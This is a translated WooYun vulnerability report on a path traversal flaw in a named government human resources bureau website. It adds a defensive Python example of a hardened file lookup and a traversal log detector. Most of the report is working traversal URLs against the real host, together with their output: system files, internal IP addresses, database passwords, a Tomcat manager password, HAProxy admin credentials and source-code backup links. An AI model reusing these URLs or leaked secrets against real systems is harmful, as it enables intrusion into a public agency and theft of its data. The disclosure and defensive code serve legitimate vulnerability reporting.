
Vulnerability summary

Defect ID: wooyun-2015-0123874

Title: File inclusion vulnerability at a human resources and social security bureau

Affected vendor: a human resources and social security bureau

Author: 路人甲

Submitted: 2015-07-01 15:17

Fixed: 2015-08-17 15:54

Published: 2015-08-17 15:54

Vulnerability type: arbitrary file traversal/download

Severity: high

Self-assessed rank: 15

Status: handed to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-07-01: details reported to the vendor, awaiting vendor handling
2015-07-03: vendor confirmed; details disclosed to the vendor only
2015-07-13: details disclosed to core white hats and domain experts
2015-07-23: details disclosed to regular white hats
2015-08-02: details disclosed to intern white hats
2015-08-17: details disclosed to the public

Brief description:

Leaks sensitive information; the privileges obtained are very broad and the foothold can be taken further!!

Detailed description:

http://www.xtrs.gov.cn/xtzj/new/unitPicUpload

[Screenshot: upload.png]


Arbitrary file upload; uploading a file reveals the path it is stored under:
http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=13532928829532
The same download endpoint allows arbitrary file download:
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/passwd


The application runs as root, so /etc/shadow can be read directly:
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/shadow


The SSH port is open; I did not manage to crack the password.
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/hosts

# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 xtwebapp1 localhost.localdomain localhost
10.137.75.20 xtwebdb1
10.137.75.30 xtwebdb2
::1 localhost6.localdomain6 localhost6


http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../root/.bash_history

[Screenshot: 1.png]


The bash history gives away the web root, /usr/local/apache-tomcat-7.0.27/webapps,
and from there the database configuration file jdbc.properties:

jdbc.driver=oracle.jdbc.OracleDriver
#jdbc.url=jdbc:oracle:thin:@10.141.136.58:1521:hygeia
#jdbc.url=jdbc:oracle:thin:@172.18.100.108:1521:develop
#jdbc.url=jdbc:oracle:thin:@localhost:1521:orcl
#jdbc.url=jdbc:oracle:thin:@10.141.136.38:1521:czwebcx
jdbc.url=jdbc:oracle:thin:@(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = 10.137.75.30)(PORT = 1521))(ADDRESS = (PROTOCOL = TCP)(HOST = 10.137.75.20)(PORT = 1521))(LOAD_BALANCE = yes)(FAILOVER = ON)(CONNECT_DATA =(SERVER = DEDICATED)(SERVICE_NAME = orcl)(FAILOVER_MODE=(TYPE = SELECT)(METHOD = BASIC)(RETIRES = 20)(DELAY = 15))))
#jdbc.username=czportal
#jdbc.password=Czxx#622#zx$&system
#jdbc.username=cmsczportal
#jdbc.password=cmsczportal
#jdbc.username=cmstouch
#jdbc.password=cmstouch
#jdbc.username=cmsks
#jdbc.password=yanquebeilu$CZRSKS$20111018
jdbc.username=xtrsks
jdbc.password=xtrsks


The old passwords were actually pretty strong.

<Context reloadable="true"> 
<WatchedResource>WEB-INF/web.xml</WatchedResource>
<Resource name="jdbc/xthr" auth="Container" type="javax.sql.DataSource"
maxActive="100" maxIdle="20" maxWait="10000" username="opencms" password="xtrsxxzx" driverClassName="oracle.jdbc.driver.OracleDriver"
url="jdbc:oracle:thin:@(DESCRIPTION=(LOAD_BALANCE=on)(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=10.137.75.20) (PORT=1521))(ADDRESS=(PROTOCOL=TCP)(HOST=10.137.75.30)(PORT=1521)))(CONNECT_DATA=(SERVICE_NAME=orcl)))"/>
</Context>


http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../..//usr/local/apache-tomcat-7.0.27/conf/tomcat-users.xml

<?xml version='1.0' encoding='utf-8'?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users>
<!--
NOTE: By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary.
-->
<!--
NOTE: The sample user and role entries below are wrapped in a comment
and thus are ignored when reading this file. Do not forget to remove
<!.. ..> that surrounds them.
-->
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
<user username="both" password="tomcat" roles="tomcat,role1"/>
<user username="role1" password="tomcat" roles="role1"/>
-->
<role rolename="manager-gui"/>
<user username="tomcat" password="tomcat$xt$123$RS" roles="manager-gui"/>
</tomcat-users>


http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../../usr/haproxy/haproxy.cfg

global                                
log 127.0.0.1 local0
#log 127.0.0.1 local1 notice
#log loghost local0 info
ulimit-n 82000
maxconn 4096
chroot /usr/haproxy
uid 99
gid 99
daemon
nbproc 3
pidfile /usr/haproxy/logs/haproxy.pid
# debug
#quiet
defaults
log global
log 127.0.0.1 local3
mode http
option httplog
option httpclose

option dontlognull
option forwardfor

option redispatch
retries 2
maxconn 2000
balance roundrobin
stats uri /stats
contimeout 50000
clitimeout 500000
srvtimeout 500000
listen app-balancer 0.0.0.0:9090
mode http
# log 127.0.0.1 local3
#cookie ServerID insert nocache
cookie ServerID prefix
cookie JSESSIONID prefix
capture request header Cookie len 200
capture request header X-Forwarded-For len 15
capture request header Host len 15
capture request header Referrer len 15
appsession JSESSIONID len 52 timeout 1080000
balance roundrobin
option httpchk GET /ggfw_web/test.html HTTP/1.0
server ggfwweb_1 10.137.75.12:7001 cookie app1 minconn 100 maxconn 40960 check inter 5000 rise 2 fall 5 weight 2
server ggfwweb_2 10.137.75.13:7001 cookie app2 minconn 100 maxconn 40960 check inter 2000 rise 2 fall 5 weight 2
#option forwardfor except 192.168.0.159
option forwardfor
stats enable
stats uri /stats
stats realm "ggfw monitor"
stats auth admin:admin
Stats page credentials: username admin, password admin


[Screenshot: stats.png]


[Screenshot: 2.png]


It would be bad if someone exploited this maliciously.
http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../../usr/local/apache-tomcat-7.0.27/webapps/XTExam.zip
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../..//usr/local/apache-tomcat-7.0.27/webapps_1/cmsczportal.zip
Backups of the site's source code. Code audit? What's that? I'm not going to dig any deeper; I'd rather not get "invited for tea".


Proof of vulnerability:

http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/passwd
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/shadow
http://www.xtrs.gov.cn/xtzj/new/unitPicFile?unitPicFileName=../../../../../root/.bash_history
http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../..//usr/local/apache-tomcat-7.0.27/conf/tomcat-users.xml
http://www.xtrs.gov.cn/xtzj//new/unitPicFile?unitPicFileName=../../../../../usr/haproxy/haproxy.cfg

Fix recommendation:

I don't know anything about that~ =。=!
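The report leaves the fix section empty. As an added example that is not part of the original report or the vendor's code, the block below shows the defect in a download lookup of the unitPicFile kind (raw join of unitPicFileName onto the upload directory) beside a hardened version, plus a detector for traversal attempts in access logs. The upload directory, the numeric file-name allow-list and the sample log lines are constructed assumptions.

```python
"""Hardened lookup for a download endpoint like unitPicFile (added example)."""
import os
import re
from typing import Optional
from urllib.parse import unquote

# Uploads in the report are stored under numeric ids (e.g. 13532928829532), so the
# allow-list is "digits only, optional image extension" (an assumption of this example).
SAFE_NAME = re.compile(r"^[0-9]{1,20}(\.(png|jpg|jpeg|gif))?$")


def vulnerable_path(upload_dir: str, name: str) -> str:
    """The defect: user input joined onto the upload directory with no
    canonicalisation or containment check; normpath shows what the OS opens."""
    return os.path.normpath(os.path.join(upload_dir, name))


def safe_path(upload_dir: str, name: str) -> Optional[str]:
    """Return an absolute path inside upload_dir, or None (respond 400/404)."""
    name = unquote(name)  # decode once so %2e%2e cannot dodge the pattern check
    if not SAFE_NAME.fullmatch(name):
        return None
    base = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(base, name))
    # Containment check catches symlinks and anything the pattern might miss.
    if os.path.commonpath([base, target]) != base:
        return None
    return target


# Detection: traversal sequences in the unitPicFileName parameter of access logs.
TRAVERSAL = re.compile(r"unitPicFileName=[^ &]*?(\.\./|\.\.%2f|%2e%2e)", re.I)

# Constructed sample access-log lines (not taken from the report).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jul/2015:15:10:02 +0800] "GET /xtzj/new/unitPicFile?unitPicFileName=13532928829532 HTTP/1.1" 200 4021',
    '10.0.0.5 - - [01/Jul/2015:15:11:40 +0800] "GET /xtzj/new/unitPicFile?unitPicFileName=../../../../../etc/passwd HTTP/1.1" 200 1803',
    '10.0.0.5 - - [01/Jul/2015:15:12:01 +0800] "GET /xtzj/new/unitPicFile?unitPicFileName=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 1530',
]


def traversal_hits(log_lines):
    """Return the log lines whose unitPicFileName carries a traversal sequence."""
    return [ln for ln in log_lines if TRAVERSAL.search(ln)]


if __name__ == "__main__":
    print(vulnerable_path("/srv/uploads", "../../../../../etc/passwd"))  # /etc/passwd
    print(safe_path("/srv/uploads", "../../../../../etc/passwd"))  # None
    print(len(traversal_hits(SAMPLE_LOG)))  # 2
```

The allow-list alone would already reject every URL quoted in this report; the realpath containment check is what keeps the handler safe once the naming scheme changes.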

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: medium

Vulnerability rank: 10

Confirmed: 2015-07-03 15:52

Vendor reply:

CNVD has confirmed and reproduced the described vulnerability; it has been forwarded through CNCERT to the Hunan branch centre, which will coordinate remediation with the unit that operates the website.

Latest status:

None yet